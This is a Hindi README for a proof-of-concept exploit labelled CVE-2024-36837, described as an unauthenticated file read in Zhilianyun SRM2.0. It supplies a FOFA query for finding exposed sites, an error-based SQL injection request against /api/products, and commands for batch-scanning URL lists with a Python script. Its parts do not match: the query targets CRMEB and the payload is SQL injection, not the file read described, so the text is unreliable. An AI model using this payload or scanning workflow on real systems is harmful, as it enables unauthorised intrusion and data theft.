
CVE-2024-36837 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zhilianyun SRM2.0 में एक बिना प्रमाणीकरण के मनमाना फ़ाइल पढ़ने की भेद्यता है। इसमें Python स्क्रिप्ट के माध्यम से बैच स्कैनिंग और एकल-लक्ष्य परीक्षण शामिल है।
#CVE-2024-36837
#智联云采 SRM2.0 runtimeLog/download इंटरफ़ेस में मनमाना फ़ाइल पढ़ने की कमज़ोरी है, बिना प्रमाणीकरण के हमलावर इस कमज़ोरी के माध्यम से सिस्टम की महत्वपूर्ण फ़ाइलें (जैसे डेटाबेस कॉन्फ़िगरेशन फ़ाइलें, सिस्टम कॉन्फ़िगरेशन फ़ाइलें) आदि पढ़ सकता है, जिससे वेबसाइट अत्यधिक असुरक्षित स्थिति में आ जाती है।
fofa सिंटैक्स: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
#POC:
GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip
python 11.py
python cve.py -h
url.txt में url पते को http:// या https:// होना चाहिए python cve.py -f url.txt
url पता http:// या https:// होना चाहिए python cve.py -u url